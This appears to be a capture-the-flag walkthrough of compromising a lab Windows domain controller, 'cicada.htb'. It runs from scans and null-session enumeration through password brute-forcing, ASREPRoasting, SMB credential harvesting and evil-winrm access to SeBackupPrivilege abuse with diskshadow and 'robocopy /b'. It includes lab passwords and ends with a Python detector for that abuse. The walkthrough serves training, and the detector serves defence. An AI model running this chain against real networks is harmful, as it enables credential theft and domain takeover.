-
The first step is a full port scan, followed by service and version detection on the open ports to see which technologies are exposed.
nmap -p- --open -vvv --min-rate 5000 -Pn -sS 10.10.11.35 -oG scan
/opt/extractports scan
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,51656 -sCV 10.10.11.35 -oN ports

-
I found the domain cicada.htb and added it to /etc/hosts.
-
Using a null session I manage to enumerate the system's users, and then validate with kerbrute that they really exist.
impacket-lookupsid cicada@10.10.11.35 -no-pass

-
Validate the existence of the users in the AD with kerbrute
./kerbrute_linux_386 userenum --dc 10.10.11.35 -d cicada.htb -t 100 /home/rufo/users

-
I try a brute-force attack against the users' passwords, but I get nothing.
crackmapexec smb 10.10.11.35 -u emily.oscars -p /usr/share/wordlist/rockyou.txt -k
./kerbrute_linux_386 bruteuser --dc 10.10.11.35 -d cicada.htb -t 100 -v /usr/share/wordlist/rockyou.txt Guest

-
Having a list of valid users, we can run an ASREPRoast attack (without having any passwords).
- If a user does not require Kerberos pre-authentication (the "Do not require Kerberos preauthentication" option is set on the account), the DC hands back a TGT in the AS-REP without asking for a password, and we can try to crack that hash offline to recover the clear-text password.
- But I see that no user has this option set.
impacket-GetNPUsers -no-pass -userfile /home/rufo/users cicada.htb/

-
As I see port 53 open, I try to enumerate the name servers and mail servers, and even attempt a zone transfer, but I get nothing relevant.
dig @10.10.11.35 cicada.htb ns
dig @10.10.11.35 cicada.htb mx
dig @10.10.11.35 cicada.htb axfr

-
Making use of a null session I list the shares exposed over SMB and find a folder that catches my attention, HR.
enum4linux -a -u "guest" -p '' 10.10.11.35
smbmap -H 10.10.11.35 -u 'guest' -r HR


-
I find a file containing a possible password and check whether it belongs to one of the users found earlier.
smbmap -H 10.10.11.35 -u 'guest' --download 'HR/Notice from HR.txt'

crackmapexec smb 10.10.11.35 -u ./users2 -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

-
Following the note in that file, I try to log in as the user michael.wrightson with the default password in order to change it, but I don't have permission.
smbpasswd -r cicada.htb -U michael.wrightson
net rpc password "michael.wrightson" -U "cicada.htb"/"michael.wrightson"%'Cicada$M6Corpb*@Lp#nZp!8' -S 10.10.11.35


-
Having the credentials of the user michael.wrightson, I list the SMB shares available to this user.
crackmapexec smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares

-
After going through the different folders and files I get nothing relevant. I run enum4linux again with the credentials of the found user, find a possible password in the description of a user, and see that the user emily.oscars belongs to the Remote Management Users group.
enum4linux -a -u "michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35


-
With the password found for david.orelious, I list the shares, find a file in DEV and download it to see its content.
crackmapexec smb 10.10.11.35 -u david.orelious -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
smbclient -U 'david.orelious' //10.10.11.35/DEV


-
I find the password of the user emily.oscars and validate it with crackmapexec; it is correct. As we saw before that this user belongs to the Remote Management Users group, we can connect with evil-winrm and read the first flag.
evil-winrm -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35


-
Using neo4j, bloodhound and bloodhound-python I extract information from the domain to look for a way to escalate privileges.
-
Listing my privileges, I see that I have SeBackupPrivilege.

-
Searching for information about this privilege, I see that it lets me read any file on the system regardless of its permissions.
-
With it we could read both the SYSTEM and SAM hives and try to extract the users' hashes, but since the connection to the machine was reset every few minutes, I did not have time to download the files to my local machine.
-
Because of this, I decide to read the root.txt file directly.
-
I create a file test.txt with the following content and run it as a diskshadow script; it takes a shadow copy of 'c:' and exposes it as a new volume 'v:'.
set context persistent nowriters
add volume c: alias rufo
create
expose %rufo% v:
diskshadow.exe /s c:\Temp\test.txt

-
Now with robocopy, since a plain copy does not let me, I copy any file called root.txt under v:\Users\Administrator\Desktop into the current directory, indicated by the '.'. The /b switch runs robocopy in backup mode, which is what makes SeBackupPrivilege apply to the copy. With this I already have the content of the root.txt file.
cd c:\Temp
robocopy /b v:\Users\Administrator\Desktop\ . root.txt
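As an added defender-side example (not part of this write-up), the following Python flags the trail the escalation above leaves in the Windows Security log: a 4672 "special privileges assigned" event carrying SeBackupPrivilege for an account that is not a known backup identity, followed in the same logon session by a scripted diskshadow run or a robocopy /b copy recorded as 4688 process creation. The events are constructed samples modelled on those two event IDs, and the svc_backup allow-list entry is hypothetical.

```python
import re

# Constructed sample events modelled on Windows Security log fields
# (4672 = special privileges assigned to new logon, 4688 = process creation).
SAMPLE_EVENTS = [
    {"id": 4672, "logon_id": "0x3e7", "user": "SYSTEM",
     "privileges": "SeAssignPrimaryTokenPrivilege SeBackupPrivilege SeRestorePrivilege"},
    {"id": 4672, "logon_id": "0x5a1f2", "user": "emily.oscars",
     "privileges": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"id": 4688, "logon_id": "0x5a1f2", "user": "emily.oscars",
     "process": r"C:\Windows\System32\diskshadow.exe",
     "cmdline": r"diskshadow.exe /s c:\Temp\test.txt"},
    {"id": 4688, "logon_id": "0x5a1f2", "user": "emily.oscars",
     "process": r"C:\Windows\System32\Robocopy.exe",
     "cmdline": r"robocopy /b v:\Users\Administrator\Desktop\ . root.txt"},
    {"id": 4688, "logon_id": "0x7b22c", "user": "svc_backup",
     "process": r"C:\Windows\System32\Robocopy.exe",
     "cmdline": r"robocopy /mir D:\Data E:\Backup"},
]

# Hypothetical allow-list of identities expected to hold SeBackupPrivilege.
BACKUP_ACCOUNTS = {"SYSTEM", "svc_backup"}


def suspicious_process(ev):
    """Return a reason if a 4688 event is a scripted diskshadow run or a backup-mode robocopy."""
    name = ev["process"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"].lower()
    if name == "diskshadow.exe" and re.search(r"\s/s\b", cmd):
        return "scripted diskshadow run"
    if name == "robocopy.exe" and re.search(r"\s/b\b", cmd):
        return "robocopy in backup mode (/b)"
    return None


def detect(events):
    """Correlate SeBackupPrivilege grants (4672) with shadow-copy/backup-mode processes (4688)."""
    backup_logons = {}  # logon_id -> user, for non-allow-listed accounts holding SeBackupPrivilege
    for ev in events:
        if ev["id"] == 4672 and "SeBackupPrivilege" in ev["privileges"].split() \
                and ev["user"] not in BACKUP_ACCOUNTS:
            backup_logons[ev["logon_id"]] = ev["user"]
    alerts = []
    for ev in events:
        if ev["id"] != 4688:
            continue
        reason = suspicious_process(ev)
        if reason is None:
            continue
        # Same logon session that was granted the privilege: raise the severity.
        severity = "high" if ev["logon_id"] in backup_logons else "medium"
        alerts.append((severity, ev["user"], reason))
    return alerts
```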
